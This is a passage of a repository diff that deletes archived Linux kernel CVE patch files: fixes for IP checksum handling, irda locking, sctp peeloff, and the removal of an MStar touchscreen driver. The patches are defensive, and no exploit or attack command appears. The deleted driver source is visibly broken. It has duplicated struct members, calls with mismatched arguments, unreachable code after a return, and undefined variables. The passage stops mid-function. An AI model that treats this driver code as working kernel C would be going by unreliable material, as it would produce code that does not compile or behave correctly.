-From ca4ef4574f1ee5252e2cd365f8f5d5bafd048f32 Mon Sep 17 00:00:00 2001
-From: Paolo Abeni
-Date: Tue, 21 Feb 2017 09:33:18 +0100
-Subject: ip: fix IP_CHECKSUM handling
-
-The skbs processed by ip_cmsg_recv() are not guaranteed to
-be linear e.g. when sending UDP packets over loopback with
-MSGMORE.
-Using csum_partial() on [potentially] the whole skb len
-is dangerous; instead be on the safe side and use skb_checksum().
-
-Thanks to syzkaller team to detect the issue and provide the
-reproducer.
-
-v1 -> v2:
- - move the variable declaration in a tighter scope
-
-Fixes: ad6f939ab193 ("ip: Add offset parameter to ip_cmsg_recv")
-Reported-by: Andrey Konovalov
-Signed-off-by: Paolo Abeni
-Acked-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/ipv4/ip_sockglue.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
-index ce1386a..ebd953b 100644
---- a/net/ipv4/ip_sockglue.c
-+++ b/net/ipv4/ip_sockglue.c
-@@ -116,10 +116,10 @@ static void ip_cmsg_recv_checksum(struct msghdr *msg, struct sk_buff *skb,
- if (skb->ip_summed != CHECKSUM_COMPLETE)
- return;
-
-- if (offset != 0)
-- csum = csum_sub(csum,
-- csum_partial(skb_transport_header(skb) + tlen,
-- offset, 0));
-+ if (offset != 0) {
-+ int tend_off = skb_transport_offset(skb) + tlen;
-+ csum = csum_sub(csum, skb_checksum(skb, tend_off, offset, 0));
-+ }
-
- put_cmsg(msg, SOL_IP, IP_CHECKSUM, sizeof(__wsum), &csum);
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6348/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6348/^4.9/0001.patch
deleted file mode 100644
index edc7e72f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6348/^4.9/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 4c03b862b12f980456f9de92db6d508a4999b788 Mon Sep 17 00:00:00 2001
-From: "David S. Miller"
-Date: Fri, 17 Feb 2017 16:19:39 -0500
-Subject: irda: Fix lockdep annotations in hashbin_delete().
-
-A nested lock depth was added to the hasbin_delete() code but it
-doesn't actually work some well and results in tons of lockdep splats.
-
-Fix the code instead to properly drop the lock around the operation
-and just keep peeking the head of the hashbin queue.
-
-Reported-by: Dmitry Vyukov
-Tested-by: Dmitry Vyukov
-Signed-off-by: David S. Miller
----
- net/irda/irqueue.c | 34 ++++++++++++++++------------------
- 1 file changed, 16 insertions(+), 18 deletions(-)
-
-diff --git a/net/irda/irqueue.c b/net/irda/irqueue.c
-index acbe61c..160dc89 100644
---- a/net/irda/irqueue.c
-+++ b/net/irda/irqueue.c
-@@ -383,9 +383,6 @@ EXPORT_SYMBOL(hashbin_new);
- * for deallocating this structure if it's complex. If not the user can
- * just supply kfree, which should take care of the job.
- */
--#ifdef CONFIG_LOCKDEP
--static int hashbin_lock_depth = 0;
--#endif
- int hashbin_delete( hashbin_t* hashbin, FREE_FUNC free_func)
- {
- irda_queue_t* queue;
-@@ -396,22 +393,27 @@ int hashbin_delete( hashbin_t* hashbin, FREE_FUNC free_func)
- IRDA_ASSERT(hashbin->magic == HB_MAGIC, return -1;);
-
- /* Synchronize */
-- if ( hashbin->hb_type & HB_LOCK ) {
-- spin_lock_irqsave_nested(&hashbin->hb_spinlock, flags,
-- hashbin_lock_depth++);
-- }
-+ if (hashbin->hb_type & HB_LOCK)
-+ spin_lock_irqsave(&hashbin->hb_spinlock, flags);
-
- /*
- * Free the entries in the hashbin, TODO: use hashbin_clear when
- * it has been shown to work
- */
- for (i = 0; i < HASHBIN_SIZE; i ++ ) {
-- queue = dequeue_first((irda_queue_t**) &hashbin->hb_queue[i]);
-- while (queue ) {
-- if (free_func)
-- (*free_func)(queue);
-- queue = dequeue_first(
-- (irda_queue_t**) &hashbin->hb_queue[i]);
-+ while (1) {
-+ queue = dequeue_first((irda_queue_t**) &hashbin->hb_queue[i]);
-+
-+ if (!queue)
-+ break;
-+
-+ if (free_func) {
-+ if (hashbin->hb_type & HB_LOCK)
-+ spin_unlock_irqrestore(&hashbin->hb_spinlock, flags);
-+ free_func(queue);
-+ if (hashbin->hb_type & HB_LOCK)
-+ spin_lock_irqsave(&hashbin->hb_spinlock, flags);
-+ }
- }
- }
-
-@@ -420,12 +422,8 @@ int hashbin_delete( hashbin_t* hashbin, FREE_FUNC free_func)
- hashbin->magic = ~HB_MAGIC;
-
- /* Release lock */
-- if ( hashbin->hb_type & HB_LOCK) {
-+ if (hashbin->hb_type & HB_LOCK)
- spin_unlock_irqrestore(&hashbin->hb_spinlock, flags);
--#ifdef CONFIG_LOCKDEP
-- hashbin_lock_depth--;
--#endif
-- }
-
- /*
- * Free the hashbin structure
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6353/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-6353/^4.10/0001.patch
deleted file mode 100644
index a4a77489..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6353/^4.10/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From dfcb9f4f99f1e9a49e43398a7bfbf56927544af1 Mon Sep 17 00:00:00 2001
-From: Marcelo Ricardo Leitner
-Date: Thu, 23 Feb 2017 09:31:18 -0300
-Subject: sctp: deny peeloff operation on asocs with threads sleeping on it
-
-commit 2dcab5984841 ("sctp: avoid BUG_ON on sctp_wait_for_sndbuf")
-attempted to avoid a BUG_ON call when the association being used for a
-sendmsg() is blocked waiting for more sndbuf and another thread did a
-peeloff operation on such asoc, moving it to another socket.
-
-As Ben Hutchings noticed, then in such case it would return without
-locking back the socket and would cause two unlocks in a row.
-
-Further analysis also revealed that it could allow a double free if the
-application managed to peeloff the asoc that is created during the
-sendmsg call, because then sctp_sendmsg() would try to free the asoc
-that was created only for that call.
-
-This patch takes another approach. It will deny the peeloff operation
-if there is a thread sleeping on the asoc, so this situation doesn't
-exist anymore. This avoids the issues described above and also honors
-the syscalls that are already being handled (it can be multiple sendmsg
-calls).
-
-Joint work with Xin Long.
-
-Fixes: 2dcab5984841 ("sctp: avoid BUG_ON on sctp_wait_for_sndbuf")
-Cc: Alexander Popov
-Cc: Ben Hutchings
-Signed-off-by: Marcelo Ricardo Leitner
-Signed-off-by: Xin Long
-Signed-off-by: David S. Miller
----
- net/sctp/socket.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/net/sctp/socket.c b/net/sctp/socket.c
-index b532148..465a9c8 100644
---- a/net/sctp/socket.c
-+++ b/net/sctp/socket.c
-@@ -4862,6 +4862,12 @@ int sctp_do_peeloff(struct sock *sk, sctp_assoc_t id, struct socket **sockp)
- if (!asoc)
- return -EINVAL;
-
-+ /* If there is a thread waiting on more sndbuf space for
-+ * sending on this asoc, it cannot be peeled.
-+ */
-+ if (waitqueue_active(&asoc->wait))
-+ return -EBUSY;
-+
- /* An association cannot be branched off from an already peeled-off
- * socket, nor is this supported for tcp style sockets.
- */
-@@ -7599,8 +7605,6 @@ static int sctp_wait_for_sndbuf(struct sctp_association *asoc, long *timeo_p,
- */
- release_sock(sk);
- current_timeo = schedule_timeout(current_timeo);
-- if (sk != asoc->base.sk)
-- goto do_error;
- lock_sock(sk);
-
- *timeo_p = current_timeo;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6421/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6421/ANY/0001.patch
deleted file mode 100644
index 0b4c4ae4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6421/ANY/0001.patch
+++ /dev/null
@@ -1,2398 +0,0 @@ -From be42c7ff1f0396484882451fd18f47144c8f1b6b Mon Sep 17 00:00:00 2001 -From: Shantanu Jain -Date: Thu, 16 Feb 2017 11:39:44 +0530 -Subject: input: touchscreen: remove msg21xx mstar touch driver - -Remove msg21xx mstar touch driver from the kernel code -as it has never been used in any of the recent platforms. - -Change-Id: I0ac1f93d9736c402732b6c4a8d22b1bf3500e4c4 -Signed-off-by: Vevek Venkatesan -Signed-off-by: Shantanu Jain ---- - .../bindings/input/touchscreen/msg21xx-ts.txt | 71 - - drivers/input/touchscreen/Kconfig | 11 - - drivers/input/touchscreen/Makefile | 1 - - drivers/input/touchscreen/msg21xx_ts.c | 2260 -------------------- - 4 files changed, 2343 deletions(-) - delete mode 100644 Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt - delete mode 100644 drivers/input/touchscreen/msg21xx_ts.c - -diff --git a/Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt b/Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt -deleted file mode 100644 -index 7315aef..0000000 ---- a/Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt -+++ /dev/null -@@ -1,71 +0,0 @@ --Mstar touch controller -- --The mstar controller is connected to host processor --via i2c. The controller generates interrupts when the --user touches the panel. The host controller is expected --to read the touch coordinates over i2c and pass the coordinates --to the rest of the system. -- --Required properties: -- -- - compatible : should be "mstar,msg21xx". -- - reg : i2c slave address of the device. -- - interrupt-parent : parent of interrupt. -- - interrupts : touch sample interrupt to indicate presense or release -- of fingers on the panel. -- - vdd-supply : Power supply needed to power up the device. -- - vcc_i2c-supply : Power source required to power up i2c bus. -- - mstar,irq-gpio : irq gpio which is to provide interrupts to host, -- same as "interrupts" node. 
It will also -- contain active low or active high information. -- - mstar,reset-gpio : reset gpio to control the reset of chip. -- - mstar,display-coords : display coords in pixels. It is a four -- tuple consisting of min x, min y, max x and -- max y values. -- - pinctrl-names : This should be defined if a target uses pinctrl framework. -- See "pinctrl" in Documentation/devicetree/bindings/pinctrl/msm-pinctrl.txt. -- Specify the names of the configs that pinctrl can install in driver. -- Following are the pinctrl configs that can be installed: -- "pmx_ts_active" : Active configuration of pins, this should specify active -- config defined in pin groups of interrupt and reset gpio. -- "pmx_ts_suspend" : Disabled configuration of pins, this should specify sleep -- config defined in pin groups of interrupt and reset gpio. -- "pmx_ts_release" : Release configuration of pins, this should specify -- release config defined in pin groups of interrupt and reset gpio. -- - mstar,num-max-touches: It defines the maximum number of touch supported by the controller. -- - mstar,hard-reset-delay-ms : hard reset delay in ms -- - mstar,post-hard-reset-delay-ms : post hard reset delay in ms -- --Optional properties: -- -- - mstar,button-map : button map of key codes. It is a three tuple consisting of key codes. -- - mstar,panel-coords : panel coords for the chip in pixels. -- It is a four tuple consisting of min x, -- min y, max x and max y values. -- - mstar,ic-type : It defines the ic-type of the controller. Values are as folows: -- 1 -> msg2133. -- 2 -> msg21xxA. -- 3 -> msg26xxM. 
-- --Example: -- i2c@78b9000 { /* BLSP1 QUP5 */ -- mstar@26 { -- compatible = "mstar,msg21xx"; -- reg = <0x26>; -- interrupt-parent = <&msm_gpio>; -- interrupts = <13 0x2008>; -- mstar,irq-gpio = <&msm_gpio 13 0x00000001>; -- mstar,reset-gpio = <&msm_gpio 12 0x0>; -- vdd-supply = <&pm8916_l17>; -- vcc_i2c-supply = <&pm8916_l6>; -- mstar,display-coords = <0 0 480 854>; -- pinctrl-names = "pmx_ts_active","pmx_ts_suspend"; -- pinctrl-0 = <&ts_int_active &ts_reset_active>; -- pinctrl-1 = <&ts_int_suspend &ts_reset_suspend>; -- mstar,button-map = <172 139 158>; -- mstar,ic-type = <2>; -- mstar,num_max_touches = <2>; -- mstar,hard-reset-delay-ms = <100>; -- mstar,post-hard-reset-delay-ms = <100>; -- }; -- }; -diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig -index 49df5e0..9044bb5 100644 ---- a/drivers/input/touchscreen/Kconfig -+++ b/drivers/input/touchscreen/Kconfig -@@ -1128,17 +1128,6 @@ config TOUCHSCREEN_FT5X06_GESTURE - - If unsure, say N. - --config TOUCHSCREEN_MSTAR21XX -- tristate "Mstar touchscreens" -- depends on I2C -- help -- Say Y here if you have a mstar touchscreen. -- -- If unsure, say N. -- -- To compile this driver as a module, choose M here: the -- module will be called msg21xx_ts. 
-- - config TOUCHSCREEN_ROHM_BU21023 - tristate "ROHM BU21023/24 Dual touch support resistive touchscreens" - depends on I2C -diff --git a/drivers/input/touchscreen/Makefile b/drivers/input/touchscreen/Makefile -index 06953a6..1b6844b 100644 ---- a/drivers/input/touchscreen/Makefile -+++ b/drivers/input/touchscreen/Makefile -@@ -98,5 +98,4 @@ obj-$(CONFIG_TOUCHSCREEN_TPS6507X) += tps6507x-ts.o - obj-$(CONFIG_TOUCHSCREEN_ZFORCE) += zforce_ts.o - obj-$(CONFIG_TOUCHSCREEN_COLIBRI_VF50) += colibri-vf50-ts.o - obj-$(CONFIG_TOUCHSCREEN_ROHM_BU21023) += rohm_bu21023.o --obj-$(CONFIG_TOUCHSCREEN_MSTAR21XX) += msg21xx_ts.o - obj-$(CONFIG_TOUCHSCREEN_GT9XX) += gt9xx/ -diff --git a/drivers/input/touchscreen/msg21xx_ts.c b/drivers/input/touchscreen/msg21xx_ts.c -deleted file mode 100644 -index fe8c6e164..0000000 ---- a/drivers/input/touchscreen/msg21xx_ts.c -+++ /dev/null -@@ -1,2260 +0,0 @@ --/* -- * MStar MSG21XX touchscreen driver -- * -- * Copyright (c) 2006-2012 MStar Semiconductor, Inc. -- * -- * Copyright (C) 2012 Bruce Ding -- * -- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License as published by -- * the Free Software Foundation; either version 2 of the License, or -- * (at your option) any later version. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. 
-- */ -- --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include -- --#if defined(CONFIG_FB) --#include --#include --#endif --#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR --#include --#endif -- --/* Macro Definition */ -- --#define TOUCH_DRIVER_DEBUG 0 --#if (TOUCH_DRIVER_DEBUG == 1) --#define DBG(fmt, arg...) pr_info(fmt, ##arg) --#else --#define DBG(fmt, arg...) --#endif -- --/* Constant Value & Variable Definition */ -- --#define MSTAR_VTG_MIN_UV 2800000 --#define MSTAR_VTG_MAX_UV 3300000 --#define MSTAR_I2C_VTG_MIN_UV 1800000 --#define MSTAR_I2C_VTG_MAX_UV 1800000 -- --#define MAX_BUTTONS 4 --#define FT_COORDS_ARR_SIZE 4 --#define MSTAR_FW_NAME_MAX_LEN 50 -- --#define MSTAR_CHIPTOP_REGISTER_BANK 0x1E --#define MSTAR_CHIPTOP_REGISTER_ICTYPE 0xCC --#define MSTAR_INIT_SW_ID 0x7FF --#define MSTAR_DEBUG_DIR_NAME "ts_debug" -- --#define MSG_FW_FILE_MAJOR_VERSION(x) \ -- (((x)->data[0x7f4f] << 8) + ((x)->data[0x7f4e])) -- --#define MSG_FW_FILE_MINOR_VERSION(x) \ -- (((x)->data[0x7f51] << 8) + ((x)->data[0x7f50])) -- --/* -- * Note. -- * Please do not change the below setting. 
-- */ --#define TPD_WIDTH (2048) --#define TPD_HEIGHT (2048) -- --#ifdef FIRMWARE_AUTOUPDATE --enum { -- SWID_START = 1, -- SWID_TRULY = SWID_START, -- SWID_NULL, --}; -- --static unsigned char MSG_FIRMWARE[1][33*1024] = { { -- #include "msg21xx_truly_update_bin.h" -- } --}; --#endif -- --#define CONFIG_TP_HAVE_KEY --#define PINCTRL_STATE_ACTIVE "pmx_ts_active" --#define PINCTRL_STATE_SUSPEND "pmx_ts_suspend" --#define PINCTRL_STATE_RELEASE "pmx_ts_release" -- --#define SLAVE_I2C_ID_DBBUS (0xC4>>1) -- --#define DEMO_MODE_PACKET_LENGTH (8) -- --#define TP_PRINT -- --static char *fw_version; /* customer firmware version */ --static unsigned short fw_version_major; --static unsigned short fw_version_minor; --static unsigned char temp[94][1024]; --static unsigned int crc32_table[256]; -- --static unsigned short fw_file_major, fw_file_minor; --static unsigned short main_sw_id = MSTAR_INIT_SW_ID; --static unsigned short info_sw_id = MSTAR_INIT_SW_ID; --static unsigned int bin_conf_crc32; -- --struct msg21xx_ts_platform_data { -- const char *name; -- char fw_name[MSTAR_FW_NAME_MAX_LEN]; -- u8 fw_version_major; -- u8 fw_version_minor; -- u32 irq_gpio; -- u32 irq_gpio_flags; -- u32 reset_gpio; -- u32 reset_gpio_flags; -- u32 x_max; -- u32 y_max; -- u32 x_min; -- u32 y_min; -- u32 panel_minx; -- u32 panel_miny; -- u32 panel_maxx; -- u32 panel_maxy; -- u32 num_max_touches; -- bool no_force_update; -- bool i2c_pull_up; -- bool ignore_id_check; -- int (*power_init)(bool); -- int (*power_on)(bool); -- int (*power_init)(bool); -- int (*power_on)(bool); -- u8 ic_type; -- u32 button_map[MAX_BUTTONS]; -- u32 num_buttons; -- u32 hard_reset_delay_ms; -- u32 post_hard_reset_delay_ms; -- bool updating_fw; --}; -- --/* Touch Data Type Definition */ --struct touchPoint_t { -- unsigned short x; -- unsigned short y; --}; -- --struct touchInfo_t { -- struct touchPoint_t *point; -- unsigned char count; -- unsigned char keycode; --}; -- --struct msg21xx_ts_data { -- struct i2c_client *client; 
-- struct input_dev *input_dev; -- struct msg21xx_ts_platform_data *pdata; -- struct regulator *vdd; -- struct regulator *vcc_i2c; -- bool suspended; --#if defined(CONFIG_FB) -- struct notifier_block fb_notif; --#endif -- struct pinctrl *ts_pinctrl; -- struct pinctrl_state *pinctrl_state_active; -- struct pinctrl_state *pinctrl_state_suspend; -- struct pinctrl_state *pinctrl_state_release; -- struct mutex ts_mutex; -- struct touchInfo_t info; --}; -- --#if defined(CONFIG_FB) --static int fb_notifier_callback(struct notifier_block *self, -- unsigned long event, void *data); --#endif -- --#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR --static unsigned char bEnableTpProximity; --static unsigned char bFaceClosingTp; --#endif -- --#ifdef TP_PRINT --static int tp_print_proc_read(struct msg21xx_ts_data *ts_data); --static void tp_print_create_entry(struct msg21xx_ts_data *ts_data); --#endif -- --static void _ReadBinConfig(struct msg21xx_ts_data *ts_data); --static unsigned int _CalMainCRC32(struct msg21xx_ts_data *ts_data); -- --static struct mutex msg21xx_mutex; -- --enum EMEM_TYPE_t { -- EMEM_ALL = 0, -- EMEM_MAIN, -- EMEM_INFO, --}; -- --/* Function Definition */ -- --static unsigned int _CRC_doReflect(unsigned int ref, signed char ch) --{ -- unsigned int value = 0; -- unsigned int i = 0; -- -- for (i = 1; i < (ch + 1); i++) { -- if (ref & 1) -- value |= 1 << (ch - i); -- ref >>= 1; -- } -- -- return value; --} -- --static unsigned int _CRC_getValue(unsigned int text, unsigned int prevCRC) --{ -- unsigned int ulCRC = prevCRC; -- -- ulCRC = (ulCRC >> 8) ^ crc32_table[(ulCRC & 0xFF) ^ text]; -- -- return ulCRC; --} -- --static void _CRC_initTable(void) --{ -- unsigned int magic_number = 0x04c11db7; -- unsigned int i, j; -- -- for (i = 0; i <= 0xFF; i++) { -- crc32_table[i] = _CRC_doReflect(i, 8) << 24; -- for (j = 0; j < 8; j++) -- crc32_table[i] = (crc32_table[i] << 1) ^ -- (crc32_table[i] & (0x80000000L) ? 
-- magic_number : 0); -- crc32_table[i] = _CRC_doReflect(crc32_table[i], 32); -- } --} -- --static void msg21xx_reset_hw(struct msg21xx_ts_platform_data *pdata) --{ -- gpio_direction_output(pdata->reset_gpio, 1); -- gpio_set_value_cansleep(pdata->reset_gpio, 0); -- /* Note that the RST must be in LOW 10ms at least */ -- usleep(pdata->hard_reset_delay_ms * 1000); -- gpio_set_value_cansleep(pdata->reset_gpio, 1); -- /* Enable the interrupt service thread/routine for INT after 50ms */ -- usleep(pdata->post_hard_reset_delay_ms * 1000); --} -- --static int read_i2c_seq(struct msg21xx_ts_data *ts_data, unsigned char addr, -- unsigned char *buf, unsigned short size) --{ -- int rc = 0; -- struct i2c_msg msgs[] = { -- { -- .addr = addr, -- .flags = I2C_M_RD, /* read flag */ -- .len = size, -- .buf = buf, -- }, -- }; -- -- /* If everything went ok (i.e. 1 msg transmitted), return #bytes -- * transmitted, else error code. -- */ -- if (ts_data->client != NULL) { -- rc = i2c_transfer(ts_data->client->adapter, msgs, 1); -- if (rc < 0) -- dev_err(&ts_data->client->dev, -- "%s error %d\n", __func__, rc); -- } else { -- dev_err(&ts_data->client->dev, "ts_data->client is NULL\n"); -- } -- -- return rc; --} -- --static int write_i2c_seq(struct msg21xx_ts_data *ts_data, unsigned char addr, -- unsigned char *buf, unsigned short size) --{ -- int rc = 0; -- struct i2c_msg msgs[] = { -- { -- .addr = addr, -- /* -- * if read flag is undefined, -- * then it means write flag. -- */ -- .flags = 0, -- .len = size, -- .buf = buf, -- }, -- }; -- -- /* -- * If everything went ok (i.e. 1 msg transmitted), return #bytes -- * transmitted, else error code. 
-- */ -- if (ts_data->client != NULL) { -- rc = i2c_transfer(ts_data->client->adapter, msgs, 1); -- if (rc < 0) -- dev_err(&ts_data->client->dev, -- "%s error %d\n", __func__, rc); -- } else { -- dev_err(&ts_data->client->dev, "ts_data->client is NULL\n"); -- } -- -- return rc; --} -- --static unsigned short read_reg(struct msg21xx_ts_data *ts_data, -- unsigned char bank, unsigned char addr) --{ -- unsigned char tx_data[3] = {0x10, bank, addr}; -- unsigned char rx_data[2] = {0}; -- -- write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, tx_data, sizeof(tx_data)); -- read_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, rx_data, sizeof(rx_data)); -- -- return rx_data[1] << 8 | rx_data[0]; --} -- --static void write_reg(struct msg21xx_ts_data *ts_data, unsigned char bank, -- unsigned char addr, -- unsigned short data) --{ -- unsigned char tx_data[5] = {0x10, bank, addr, data & 0xFF, data >> 8}; -- -- write_i2c_seq(SLAVE_I2C_ID_DBBUS, &tx_data[0], 5); -- write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, tx_data, sizeof(tx_data)); --} -- --static void write_reg_8bit(struct msg21xx_ts_data *ts_data, unsigned char bank, -- unsigned char addr, -- unsigned char data) --{ -- unsigned char tx_data[4] = {0x10, bank, addr, data}; -- -- write_i2c_seq(SLAVE_I2C_ID_DBBUS, &tx_data[0], 4); -- write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, tx_data, sizeof(tx_data)); --} -- --static void dbbusDWIICEnterSerialDebugMode(struct msg21xx_ts_data *ts_data) --{ -- unsigned char data[5]; -- -- /* Enter the Serial Debug Mode */ -- data[0] = 0x53; -- data[1] = 0x45; -- data[2] = 0x52; -- data[3] = 0x44; -- data[4] = 0x42; -- -- write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data)); --} -- --static void dbbusDWIICStopMCU(struct msg21xx_ts_data *ts_data) --{ -- unsigned char data[1]; -- -- /* Stop the MCU */ -- data[0] = 0x37; -- -- write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data)); --} -- --static void dbbusDWIICIICUseBus(struct msg21xx_ts_data *ts_data) --{ -- unsigned char data[1]; -- -- /* IIC Use Bus 
*/ -- data[0] = 0x35; -- -- write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data)); --} -- --static void dbbusDWIICIICReshape(struct msg21xx_ts_data *ts_data) --{ -- unsigned char data[1]; -- -- /* IIC Re-shape */ -- data[0] = 0x71; -- -- write_i2c_seq(ts_data, SLAVE_I2C_ID_DBBUS, data, sizeof(data)); --} -- --static unsigned char msg21xx_get_ic_type(struct msg21xx_ts_data *ts_data) --{ -- unsigned char ic_type = 0; -- unsigned char bank; -- unsigned char addr; -- -- msg21xx_reset_hw(ts_data->pdata); -- dbbusDWIICEnterSerialDebugMode(ts_data); -- dbbusDWIICStopMCU(ts_data); -- dbbusDWIICIICUseBus(ts_data); -- dbbusDWIICIICReshape(ts_data); -- msleep(300); -- -- /* stop mcu */ -- write_reg_8bit(ts_data, 0x0F, 0xE6, 0x01); -- /* disable watch dog */ -- write_reg(ts_data, 0x3C, 0x60, 0xAA55); -- /* get ic type */ -- bank = MSTAR_CHIPTOP_REGISTER_BANK; -- addr = MSTAR_CHIPTOP_REGISTER_ICTYPE; -- ic_type = (0xff)&(read_reg(ts_data, bank, addr)); -- -- if (ic_type != ts_data->pdata->ic_type) -- ic_type = 0; -- -- msg21xx_reset_hw(ts_data->pdata); -- -- return ic_type; --} -- --static int msg21xx_read_firmware_id(struct msg21xx_ts_data *ts_data) --{ -- unsigned char command[3] = { 0x53, 0x00, 0x2A}; -- unsigned char response[4] = { 0 }; -- -- mutex_lock(&msg21xx_mutex); -- write_i2c_seq(ts_data, ts_data->client->addr, command, sizeof(command)); -- read_i2c_seq(ts_data, ts_data->client->addr, response, -- sizeof(response)); -- mutex_unlock(&msg21xx_mutex); -- ts_data->pdata->fw_version_major = (response[1]<<8) + response[0]; -- ts_data->pdata->fw_version_minor = (response[3]<<8) + response[2]; -- -- dev_info(&ts_data->client->dev, "major num = %d, minor num = %d\n", -- ts_data->pdata->fw_version_major, -- ts_data->pdata->fw_version_minor); -- -- return 0; --} -- --static int firmware_erase_c33(struct msg21xx_ts_data *ts_data, -- enum EMEM_TYPE_t emem_type) --{ -- /* stop mcu */ -- write_reg(ts_data, 0x0F, 0xE6, 0x0001); -- -- /* disable watch dog */ -- 
write_reg_8bit(ts_data, 0x3C, 0x60, 0x55);
-- write_reg_8bit(ts_data, 0x3C, 0x61, 0xAA);
--
-- /* set PROGRAM password */
-- write_reg_8bit(ts_data, 0x16, 0x1A, 0xBA);
-- write_reg_8bit(ts_data, 0x16, 0x1B, 0xAB);
--
-- write_reg_8bit(ts_data, 0x16, 0x18, 0x80);
--
-- if (emem_type == EMEM_ALL)
-- write_reg_8bit(ts_data, 0x16, 0x08, 0x10);
--
-- write_reg_8bit(ts_data, 0x16, 0x18, 0x40);
-- msleep(20);
--
-- /* clear pce */
-- write_reg_8bit(0x16, 0x18, 0x80);
--
-- /* erase trigger */
-- if (emem_type == EMEM_MAIN)
-- write_reg_8bit(ts_data, 0x16, 0x0E, 0x04); /* erase main */
-- else
-- write_reg_8bit(0x16, 0x0E, 0x08); /* erase all block */
--
-- return 1;
--}
--
--static void _ReadBinConfig(void);
--static unsigned int _CalMainCRC32(void);
--
--static int check_fw_update(void)
--{
-- int ret = 0;
--
-- msg21xx_read_firmware_id();
-- _ReadBinConfig();
-- if (main_sw_id == info_sw_id) {
-- if (_CalMainCRC32() == bin_conf_crc32) {
-- /*check upgrading*/
-- if ((update_bin_major == pdata->fw_version_major) &&
-- (update_bin_minor > pdata->fw_version_minor)) {
-- ret = 1;
-- }
-- }
-- }
-- return ret;
-- write_reg_8bit(ts_data, 0x16, 0x0E, 0x08); /* erase all block */
--
-- return 0;
--}
--
--static ssize_t firmware_update_c33(struct device *dev,
-- struct device_attribute *attr,
-- const char *buf, size_t size,
-- enum EMEM_TYPE_t emem_type,
-- bool isForce) {
-- unsigned int i, j;
-- unsigned int crc_main, crc_main_tp;
-- unsigned int crc_info, crc_info_tp;
-- unsigned short reg_data = 0;
-- int update_pass = 1;
-- bool fw_upgrade = false;
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- crc_main = 0xffffffff;
-- crc_info = 0xffffffff;
--
-- msg21xx_reset_hw(ts_data->pdata);
--
-- msg21xx_read_firmware_id(ts_data);
-- _ReadBinConfig(ts_data);
-- if ((main_sw_id == info_sw_id) &&
-- (_CalMainCRC32(ts_data) == bin_conf_crc32) &&
-- (fw_file_major == ts_data->pdata->fw_version_major) &&
-- (fw_file_minor > ts_data->pdata->fw_version_minor)) {
-- fw_upgrade = true;
-- }
--
-- if (!fw_upgrade && !isForce) {
-- dev_dbg(dev, "no need to update\n");
-- msg21xx_reset_hw(ts_data->pdata);
-- return size;
-- }
-- msg21xx_reset_hw(ts_data->pdata);
-- msleep(300);
--
-- dbbusDWIICEnterSerialDebugMode(ts_data);
-- dbbusDWIICStopMCU(ts_data);
-- dbbusDWIICIICUseBus(ts_data);
-- dbbusDWIICIICReshape(ts_data);
-- msleep(300);
--
-- /* erase main */
-- firmware_erase_c33(ts_data, EMEM_MAIN);
-- msleep(1000);
--
-- msg21xx_reset_hw(ts_data->pdata);
-- dbbusDWIICEnterSerialDebugMode(ts_data);
-- dbbusDWIICStopMCU(ts_data);
-- dbbusDWIICIICUseBus(ts_data);
-- dbbusDWIICIICReshape(ts_data);
-- msleep(300);
-- /*
-- * Program
-- */
-- /* polling 0x3CE4 is 0x1C70 */
-- if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
-- do {
-- reg_data = read_reg(ts_data, 0x3C, 0xE4);
-- } while (reg_data != 0x1C70);
-- }
--
-- switch (emem_type) {
-- case EMEM_ALL:
-- write_reg(ts_data, 0x3C, 0xE4, 0xE38F); /* for all-blocks */
-- break;
-- case EMEM_MAIN:
-- write_reg(ts_data, 0x3C, 0xE4, 0x7731); /* for main block */
-- break;
-- case EMEM_INFO:
-- write_reg(ts_data, 0x3C, 0xE4, 0x7731); /* for info block */
--
-- write_reg_8bit(ts_data, 0x0F, 0xE6, 0x01);
--
-- write_reg_8bit(ts_data, 0x3C, 0xE4, 0xC5);
-- write_reg_8bit(ts_data, 0x3C, 0xE5, 0x78);
--
-- write_reg_8bit(ts_data, MSTAR_CHIPTOP_REGISTER_BANK,
-- 0x04, 0x9F);
-- write_reg_8bit(ts_data, MSTAR_CHIPTOP_REGISTER_BANK,
-- 0x05, 0x82);
--
-- write_reg_8bit(ts_data, 0x0F, 0xE6, 0x00);
